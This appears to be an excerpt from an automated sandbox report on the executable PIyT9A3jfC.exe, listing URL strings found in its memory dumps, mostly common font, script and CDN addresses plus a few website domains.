                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.591392590.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js?ver=1.0.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chimpstatic.com/mcjs-connected/js/users/4c8ec8296850930fd1c281270/48b88329c63ed7575f5b4b054.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.585974089.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-2.1.4.min.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cookiedatabase.org/tcf/purposes/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dunsregistered.dnb.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://entexture.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.591392590.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Poppins%3Aital%2Cwght%400%2C100%3B0%2C200%3B0%2C300%3B0%2C5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687999536.000000000770E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Poppins:300
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C300i%2C400%2C400i%2C700%2C700i&#038;subset=la
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.591392590.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                  Source: PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hkoptlens.com/en/join
